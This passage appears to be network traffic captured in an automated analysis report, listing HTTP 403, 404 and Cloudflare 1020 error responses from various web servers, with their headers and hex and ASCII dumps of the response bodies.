20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:43:49 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:50 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:50 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:50 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd/151owQ/lnPQAbZp+OUtp,qquldgcFrj2n046g4RNSVLeuNqwcdH46iMA2Je1RdMI=X-Wix-Request-Id: 1690487030.82418714256316239X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:52 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:52 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:53 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GPTRH1xJJYjFzPAxmpqzrtCWUBmD6QwEGQLqhEcnzAgdgAvxVkPrsGrPAePuh7z12fzlhaCQf2Y2im6nwzsuZN6SGQPz4NnZFmMejvppw0mRAixLijOjOEMbWgLD2Fbz"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75fb92a1103b8-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:53 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KZC2Cy%2BNQBmjOdySwlKP5h3xUmQ87XinQDw7%2B%2FbactF2Q8p9WAbyVnq%2FFRQlYCLvgT4N8cm0hYT%2Fe2CGZfvNTW54f9ZTwDN0ooZFDHN4cRcPBMoxhIWJ1PojM5OE0m7e"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75fb96a6503b8-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 2e162721-7067-4900-b9ba-4354b3010b11CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rKrENtKUgEqC7mfzV4xnCuazlV6MBo8S0M52ew7HHQKAOUm8Y3eoadb9fbJJ9bFAuJggJpzxRzUaGF52cczdl9nikt5o5H4VRM%2F5Rr2cEv505HcOrgiyFpa8a5Sf%2FdZ8sA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=152.999878Server: cloudflareCF-RAY: 7ed75fb8ba406946-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:43:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=14X-Shopify-Stage: canaryX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 985c5891-63f5-4325-9e8b-b1b564938d17CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3GJR8VlA2gQeygHRhCEZzS%2FKkZMxIhoDmmR7eqRG2lC0gu7cAseHC3bMGG8E%2B1hJrseh%2FEjpXF3c0FdmXQv0LSBxgAMRB1gjpkRD4Yw9FNAjrRX9W2sdWKOBfSvznho%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=164.999962Server: cloudflareCF-RAY: 7ed75fbd8b271909-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:43:44 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveDate: Thu, 27 Jul 2023 19:43:55 GMTX-Zen-Fury: 0d7d88e836cab5382a51eff5c03d4c9980c7ee96Server: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Cache-Status: Data Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 38 34 36 30 22 2c 20 31 36 39 30 34 38 36 39 38 31 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 30 34 38 36 39 38 31 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 33 36 31 33 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 32 37 20 4a 75 6c 20 32 30 32 33 20 31 39 3a 34 35 3a 35 35 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC8460", 1690486981, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1690486981 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:58 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:58 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:59 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WRJzdn3y4l9CWolBYHfOyKEjDiRB0%2BdVhzJWsp6GegHNUm9sVjGxA2%2B4LLEvRJFilTfApBy0M98%2B1r%2FI0wtxCc7KF%2B8lEhCMsXR0XpeEvKSu3%2BD5u1FNdkDGYoKApnTd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75fde3a55bbe5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:59 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DIDgmZiLeMsMYR4jJFHkk8ET%2F6KXn%2BHxdY5eZbWJWbhb%2B9mk7GPFG0kRW68WaUGNFj1hqUh3UW2vY%2FUfSt4y3%2BfMem8OgV30stmIGJhMdd4a0ErH2R8qB6%2FHZaJCbI8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75fde4ccb18c5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:43:59 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L24Wc2dk5Tf4QprMG0%2FEYB1Uc4ZO7idaPW%2Bt970cjkFJkJAAYOSZgdux7wpXnVnB7iqfIW%2FL7arj2tJk41fA3fBprhro2U9iA0MbXsGgbovfHSvai7MQ9chFoeDM4bmh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75fdeaae1bbe5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:00 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9BydE9XWNdVBaXuW5MLRZB%2FyCU376a61KLpSbGULN0TU%2BZAfQ2wgAVgpdGrzvVjuyg9qLXT6%2BaYlItoqDqz1DrSnkR4ptc7kgb1FjebOiRQRZ9j1coF4v0TRt8hC1eQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75fe0a86018c5-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:44:04 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qHHX8tdRTnd09ZQ3VUjjPU7abppi8nxyo8TjvR2fBG87UVNezC0anRbdTHQxz7l4moxNMQaXcaiMhjDfD1KDs4Re4Emiv1xX2DQ3WyCb3Kkq5H7kduNM3fZX25NZjx0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed75ffcafd136dd-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
